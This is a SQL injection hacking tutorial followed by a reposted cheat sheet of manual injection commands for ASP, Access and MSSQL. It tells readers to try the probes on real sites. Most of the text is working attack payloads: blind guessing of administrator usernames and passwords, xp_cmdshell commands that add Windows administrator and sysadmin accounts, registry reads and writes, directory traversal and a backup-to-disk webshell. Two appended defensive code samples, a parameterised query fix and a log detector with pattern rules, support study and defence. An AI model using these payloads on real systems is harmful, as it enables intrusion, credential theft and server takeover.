SQL Injection Analysis (Manual Injection Detection) and Manual Injection Script Commands, Essentials Edition

The intrusion process includes the following steps:

1. Test whether the ASP system has an injection vulnerability;
2. Obtain the database table name;
3. Test the administrator ID;
4. Test the administrator username length and administrator password length;
5. Test the administrator username and password in sequence, from high to low.

Testing whether the ASP system has an injection vulnerability is the critical step. If the website has no vulnerability, there is no point in going any further. The method is also very simple. Open a category page of the ASP site, such as /list.asp?id=11 or /class.asp?id=18 in the "stealing handsome" download system, and append and 1=1 and and 1=2 in turn for testing. The specific form is

    /list.asp?id=11 and 1=1

(the following test statements are appended in the same format; tty will not explain this again). Note the space. In IE, spaces are automatically converted to %20. If the original page content displays normally with and 1=1 but does not display normally with and 1=2, the SQL injection vulnerability exists and you can carry on with the following steps.

Test the database table name

A database usually contains many tables. We need to find the table that stores the administrator username and password. For a known type of ASP system, you can download its compressed package from the Internet and open the database with the auxiliary Minister database browser to view it. They are all admin. Whether you know the table name or not, use the following statement to test it:

    and 0<>(select count(*) from admin)

If the normal page is returned, the table name is admin; otherwise, continue testing.

Test the administrator ID

Generally, a website does not have many administrators and the IDs are not very large, so test with 1, 2, 3, and so on.
The test statement is as follows:

    and (select count(*) from admin where id=1)

Change the final number 1 until the original page is returned.

It is important to test the administrator username length and the administrator password length. If you do not know how many digits the username and password have, you cannot .

    Username length: and (select count(*) from admin where id=5 and len(username)=4)
    Password length: and (select count(*) from admin where id=5 and len(pws)=4)

Note that the field names used here, username for the username and pws for the password, have to be confirmed by opening the database.

Finally, the administrator username and password are tested from high to low, one by one, until the test is completed:

    Testing the username's third letter: and (select count(*) from admin where id=5 and left(username,3)='ttd')
    Testing the 7th-bit password: and (select count(*) from admin where id=5 and left(pws,7)='123')

If everything is done correctly, you will have worked out the correct username and password. Go to the Internet, find a hacker download system or the Yifeng website system, and practise on it!

For beginners, the method above is best regarded as a way to learn the injection principle. Doing it in practice is very tiring: quite apart from getting the statements right, every character of the username and password has to be tested. A digit can take 10 tries and a letter 26, and if the username or password uses characters such as !@#$%, you will be testing for a long time, haha!

-------------------------------------

Manual Injection Script Commands, Essentials Edition
Author: Unknown
Source: cnxhacker.net

1. Determine whether injection exists
    ;and 1=1
    ;and 1=2

2. Determine whether it is MSSQL
    ;and user>0

3. The injection parameter is a character type
    'and [query condition] and ''='

4. The parameter is not filtered during search
    'and [query condition] and '%25'='

5. Determine the database system
    ;and (select count(*) from sysobjects)>0     MSSQL
    ;and (select count(*) from msysobjects)>0    Access

6. Guess the database
    ;and (select count(*) from [database name])>0

7. Guess the field
    ;and (select count(field name) from database name)>0

8. Guess the length of the record in the field
    ;and (select top 1 len(field name) from database name)>0

9. (1) Guess the ASCII value of a field (Access)
    ;and (select top 1 asc(mid(field name,1,1)) from database name)>0
   (2) Guess the ASCII value of a field (MSSQL)
    ;and (select top 1 unicode(substring(field name,1,1)) from database name)>0

10. Test the permission structure (MSSQL)
    ;and 1=(select is_srvrolemember('sysadmin'));--
    ;and 1=(select is_srvrolemember('serveradmin'));--
    ;and 1=(select is_srvrolemember('setupadmin'));--
    ;and 1=(select is_srvrolemember('securityadmin'));--
    ;and 1=(select is_srvrolemember('diskadmin'));--
    ;and 1=(select is_srvrolemember('bulkadmin'));--
    ;and 1=(select is_member('db_owner'));--

11. Add MSSQL and system accounts
    ;exec master.dbo.sp_addlogin username;--
    ;exec master.dbo.sp_password null,username,password;--
    ;exec master.dbo.sp_addsrvrolemember sysadmin username;--
    ;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
    ;exec master.dbo.xp_cmdshell 'net user username password /add';--
    ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--

12. (1) Traverse the directory
    ;create table dirs(paths varchar(100), id int)
    ;insert dirs exec master.dbo.xp_dirtree 'C:/'
    ;and (select top 1 paths from dirs)>0
    ;and (select top 1 paths from dirs where paths not in('obtained paths'))>0
    (2) Traverse directories
    ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
    ;insert temp exec master.dbo.xp_availablemedia;--    get all current drives
    ;insert into temp(id) exec master.dbo.xp_subdirs 'C:/';--    get the subdirectory list
    ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'C:/';--    get the directory tree structure of all subdirectories
    ;insert into temp(id) exec master.dbo.xp_cmdshell 'type C:/web/index.asp';--    view the file contents

13. MSSQL stored procedures
    xp_regenumvalues  root key, subkey
    ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','Software/Microsoft/Windows/CurrentVersion/run'    returns all key values as multiple record sets
    xp_regread  root key, subkey, key value name
    ;exec xp_regread 'HKEY_LOCAL_MACHINE','Software/Microsoft/Windows/currentversion','commonfilesdir'    returns the specified key value
    xp_regwrite  root key, subkey, value name, value type, value
    There are two value types: REG_SZ and REG_DWORD.
    ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','Software/Microsoft/Windows/currentversion','Testvaluename','reg_sz','Hello'    writes to the registry
    xp_regdeletevalue  root key, subkey, value name
    exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','Software/Microsoft/Windows/currentversion','Testvaluename'    deletes a value
    xp_regdeletekey 'HKEY_LOCAL_MACHINE','Software/Microsoft/Windows/CurrentVersion/testkey'    deletes a key, including all values under this key

14. MSSQL backup creates webshell
    use model
    create table cmd(str image);
    insert into cmd(str) values ('');
    backup database model to disk='C:/L.asp';

15. MSSQL built-in functions
    ;and (select @@version)>0    get the Windows version number
    ;and user_name()='dbo'    determine whether the user connected to the current system is sa
    ;and (select user_name())>0    reveal the user connected to the current system
    ;and (select db_name())>0    reveal the database currently connected

16. Simple webshell
    use model
    create table cmd(str image);
    insert into cmd(str) values ('');
    backup database model to disk='G:/wwwtest/L.asp';
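The and 1=1 / and 1=2 check in the first article works because the page pastes the id parameter straight into the SQL text. The following Python code is an added example, not from the original article: it reproduces that behaviour on a constructed in-memory SQLite database and sets it beside a handler that validates and binds the parameter. The articles table, the sample rows and the function names are assumptions made for the illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data. "admin", "username" and "pws" follow the article;
    # the "articles" table stands in for whatever list.asp reads (assumption).
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, pws TEXT);
        INSERT INTO articles VALUES (11, 'Download list');
        INSERT INTO admin VALUES (5, 'sample', 'not-a-real-secret');
    """)
    return conn

def list_vulnerable(conn, id_param):
    # Same flaw as list.asp?id=...: the raw parameter is concatenated into the
    # SQL text, so everything after the number becomes part of the WHERE clause.
    return conn.execute(
        "SELECT title FROM articles WHERE id = " + id_param).fetchall()

def list_hardened(conn, id_param):
    # 1) Accept only a short run of ASCII digits; anything else is "not found".
    if not re.fullmatch(r"[0-9]{1,9}", id_param):
        return []
    # 2) Bind the value, so it is always data and never SQL syntax.
    return conn.execute(
        "SELECT title FROM articles WHERE id = ?", (int(id_param),)).fetchall()

def leaks_boolean(handler, conn, base_id):
    # The article's test: the page renders with "and 1=1" but not with "and 1=2".
    # If the two responses differ, the page answers yes/no questions about the
    # database, which is all the later guessing steps need.
    return handler(conn, base_id + " and 1=1") != handler(conn, base_id + " and 1=2")

if __name__ == "__main__":
    db = make_db()
    probe = "11 and 0<>(select count(*) from admin)"
    print("vulnerable leaks:", leaks_boolean(list_vulnerable, db, "11"))
    print("hardened leaks:  ", leaks_boolean(list_hardened, db, "11"))
    print("table probe, vulnerable:", list_vulnerable(db, probe))
    print("table probe, hardened:  ", list_hardened(db, probe))
```

On MSSQL the same fix applies through parameterised commands, and connecting the web application with a login that is not a member of sysadmin or db_owner removes the privileges that the account-creation, xp_cmdshell and backup steps in the command list rely on.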
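The probes in the command list above leave recognisable strings in web server access logs. The following Python code is an added example, not from the original list: it URL-decodes the query string of each request and matches it against patterns taken from the list. The log layout, the rule names and the sample lines are constructed for the illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Rule name -> pattern, applied to the URL-decoded, lower-cased query string.
RULES = {
    "boolean_probe":  re.compile(r"\band\s+\d+\s*=\s*\d+"),
    "count_subquery": re.compile(r"select\s+count\s*\(.*?\)\s*from"),
    "catalog_probe":  re.compile(r"\bm?sysobjects\b"),
    "role_check":     re.compile(r"\bis_(srvrole)?member\s*\("),
    "char_extract":   re.compile(r"\b(len|left|mid|substring)\s*\("),
    "extended_proc":  re.compile(r"\b(xp_\w+|sp_addlogin|sp_password|sp_addsrvrolemember)\b"),
    "backup_to_disk": re.compile(r"\bbackup\s+database\b.*\bto\s+disk\b"),
}

# Constructed sample log. Assumed field order:
# date time client-ip method path query status
SAMPLE_LOG = """\
2024-05-01 10:00:01 198.51.100.20 GET /list.asp id=11 200
2024-05-01 10:00:05 203.0.113.7 GET /list.asp id=11%20and%201=1 200
2024-05-01 10:00:06 203.0.113.7 GET /list.asp id=11%20and%201=2 200
2024-05-01 10:00:09 203.0.113.7 GET /list.asp id=11%20and%200<>(select%20count(*)%20from%20admin) 200
2024-05-01 10:00:15 203.0.113.7 GET /list.asp id=11;and+1=(select+is_srvrolemember('sysadmin'));-- 500
2024-05-01 10:01:00 198.51.100.20 GET /search.asp q=brand1=2 200
"""

def match_rules(raw_query):
    """Return the names of all rules that fire on one still-encoded query string."""
    decoded = unquote_plus(raw_query).lower()
    return [name for name, rx in RULES.items() if rx.search(decoded)]

def scan(log_text):
    """Map each client IP to the sorted rule names its requests triggered."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 7:
            continue  # skip headers and malformed lines
        hits[fields[2]].update(match_rules(fields[5]))
    return {ip: sorted(names) for ip, names in hits.items() if names}

if __name__ == "__main__":
    for ip, names in scan(SAMPLE_LOG).items():
        print(ip, names)
```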